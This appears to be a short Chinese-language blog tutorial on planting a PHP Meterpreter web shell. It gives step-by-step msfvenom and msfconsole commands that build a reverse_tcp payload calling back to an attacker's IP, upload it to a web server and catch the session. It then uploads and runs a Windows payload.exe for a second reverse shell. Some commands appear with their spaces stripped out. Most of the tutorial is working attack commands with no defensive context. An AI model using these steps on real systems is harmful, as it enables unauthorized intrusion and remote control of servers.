php Meterpreter Webshell
1.msfvenom-pphp/meterpreter/reverse_tcpLHOST=Attacker's_IPLPORT=443T>./a.php
2.上传a.php到web服务器
3.启动msfconsole
4.usemulti/handler
5.setLHOSTAttacker's_IP
6.setLPORT443
7.setpayloadphp/meterpreter/reverse_tcp
8.exploit
9.攻击者使用浏览器访问上传的文件
10.此时,攻击者可以得到一个meterpretersession
11.打开一个终端,然后再创建一个payload
msfpayloadwindows/meterpreter/reverse_tcpLHOST=Attacker's_IPLPORT=4444
X>payload.exe
12.在session中使用upload命令将payload.exe上传
13.然后在第二个终端中运行msfconsole,设置multi/handler,paylaod为'windows/meterpreter/reverse_tcp
14.在第一个终端中运行execute-fpayload.exe
这时可以在第二个终端中获得一个meterpretersession
相关推荐
liushun 2019-12-16
bluet00 2020-06-25
bigNoseLiu 2020-06-15
Jieen 2020-05-30
酷云的csdn 2020-05-28
Sabrina 2020-04-22
pimshell 2020-04-06
伏雌摘星阁 2020-03-03
懒人的小窝 2011-06-11
Parco的IT运维 2020-02-03
xiaobater 2020-02-02
本站服务器经过更换2012版后 网站经常被人拿WEBSHELL篡改文件!找了半天也找不到漏洞在哪好在微信好友Carry的帮忙下找出了漏洞,并给出了以下的修改方案我是根据方案3修复的,在这里给大家分享下
SciRui 2019-12-14
jinkun00 2015-08-17
Yyqingmofeige 2019-11-08